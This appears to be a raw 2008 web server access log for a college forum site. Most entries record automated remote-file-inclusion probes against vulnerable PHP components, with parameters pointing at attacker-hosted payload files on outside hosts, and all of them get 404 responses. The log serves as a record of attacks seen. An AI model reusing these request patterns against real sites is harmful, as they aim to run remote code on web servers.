74.53.240.146 - - [03/Aug/2008:18:54:15 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:54:15 -0700] "GET /logs/images/errors.php?error=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.210.96.142 - - [03/Aug/2008:18:54:21 -0700] "GET /logs/access_080121.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.210.96.142 - - [03/Aug/2008:18:54:22 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.210.96.142 - - [03/Aug/2008:18:54:22 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.93.200.219 - - [03/Aug/2008:18:54:28 -0700] "GET /logs/access_080414.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:54:34 -0700] "GET /logs/access_071231.log/images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:54:34 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:54:34 -0700] "GET /logs/images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.207.106.54 - - [03/Aug/2008:18:54:40 -0700] "GET /logs/access_080121.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.207.106.54 - - [03/Aug/2008:18:54:40 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.207.106.54 - - [03/Aug/2008:18:54:40 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
207.7.108.165 - - [03/Aug/2008:18:54:54 -0700] "GET /logs//path/comments-display-tpl.php?config[comments_form_tpl]=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.collegiateforum.org"
207.7.108.165 - - [03/Aug/2008:18:54:54 -0700] "GET //path/comments-display-tpl.php?config[comments_form_tpl]=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:18:55:11 -0700] "GET /logs/access_080121.log/index.php?go=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:18:55:12 -0700] "GET /index.php?go=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:55:26 -0700] "GET /logs/access_071231.log/images/errors.php?error=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:55:29 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:18:55:29 -0700] "GET /logs/images/errors.php?error=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:18:57:06 -0700] "GET /logs/access_080616.log/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
92.61.36.98 - - [03/Aug/2008:18:58:46 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.desperate-souls.com/raid/docs/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
92.61.36.98 - - [03/Aug/2008:18:58:46 -0700] "GET /logs/access_071224.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.desperate-souls.com/raid/docs/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
92.61.36.98 - - [03/Aug/2008:18:58:47 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.desperate-souls.com/raid/docs/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
74.6.22.103 - - [03/Aug/2008:19:02:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.6.87.122 - - [03/Aug/2008:19:02:33 -0700] "GET /Jonathan_Fantini_Porter/index.php HTTP/1.0" 200 23858 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:03:01 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:03:01 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:03:01 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:19:03:21 -0700] "GET /logs/access_080121.log/index.php?go=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:19:03:27 -0700] "GET /index.php?go=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.39.5.203 - - [03/Aug/2008:19:03:30 -0700] "GET /logs/index.php?go=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.15.8.80 - - [03/Aug/2008:19:04:40 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:19:05:23 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:19:05:23 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:19:05:24 -0700] "GET /logs/access_080121.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:05:30 -0700] "GET /logs/access_071231.log/images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:05:30 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:05:30 -0700] "GET /logs/images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:05:52 -0700] "GET /logs/access_071231.log/images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:05:52 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:05:52 -0700] "GET /logs/images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:19:06:08 -0700] "GET /logs/access_080121.log/send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:19:06:08 -0700] "GET /send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.239.211.19 - - [03/Aug/2008:19:06:08 -0700] "GET /logs/send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:08:34 -0700] "GET /logs/access_071231.log/images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:08:34 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [03/Aug/2008:19:08:34 -0700] "GET /logs/images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:09:06 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:09:06 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
85.214.59.54 - - [03/Aug/2008:19:09:35 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.214.59.54 - - [03/Aug/2008:19:09:35 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.214.59.54 - - [03/Aug/2008:19:09:35 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:10:05 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:10:05 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:10:05 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:10:05 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:10:05 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:10:05 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.6.87.92 - - [03/Aug/2008:19:10:23 -0700] "GET /Jonathan_Fantini_Porter/copyright.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
67.15.186.5 - - [03/Aug/2008:19:10:28 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.186.5 - - [03/Aug/2008:19:10:28 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
67.15.186.5 - - [03/Aug/2008:19:10:28 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
74.200.78.44 - - [03/Aug/2008:19:10:38 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
124.217.231.243 - - [03/Aug/2008:19:11:10 -0700] "GET /logs/access_080121.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.glos.kit.net/info?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
124.217.231.243 - - [03/Aug/2008:19:11:27 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.glos.kit.net/info?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.collegiateforum.org"
89.111.176.106 - - [03/Aug/2008:19:11:52 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.176.106 - - [03/Aug/2008:19:11:52 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.176.106 - - [03/Aug/2008:19:11:52 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.6.22.190 - - [03/Aug/2008:19:12:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.6.87.54 - - [03/Aug/2008:19:12:21 -0700] "GET / HTTP/1.0" 200 918 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.6.87.54 - - [03/Aug/2008:19:12:21 -0700] "GET /Jonathan_Fantini_Porter/currentissue.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:12:55 -0700] "GET /logs/scripts.log//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:12:55 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:12:56 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:13:47 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:13:47 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:13:47 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:14:09 -0700] "GET /logs/access_071224.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:14:10 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:14:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
221.144.12.141 - - [03/Aug/2008:19:14:17 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:14:18 -0700] "GET /logs/access_071224.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:14:18 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:14:18 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:15:36 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:15:36 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:15:36 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:16:05 -0700] "GET /logs/access_080623.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:16:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:16:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
77.92.80.1 - - [03/Aug/2008:19:16:26 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
77.92.80.1 - - [03/Aug/2008:19:16:26 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:16:31 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:16:32 -0700] "GET //ashnews.php?pathtoashnews=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:16:39 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [03/Aug/2008:19:16:39 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:16:43 -0700] "GET /logs/scripts.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:16:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:16:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
212.117.89.191 - - [03/Aug/2008:19:16:56 -0700] "GET /config.php?path_to_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:17:03 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:17:03 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:17:03 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:17:16 -0700] "GET /logs/scripts.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:17:16 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
216.183.105.230 - - [03/Aug/2008:19:17:17 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:17:28 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
66.90.73.113 - - [03/Aug/2008:19:17:33 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:17:38 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.219.226.74 - - [03/Aug/2008:19:17:41 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
65.98.89.43 - - [03/Aug/2008:19:17:47 -0700] "GET /logs/access_071231.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
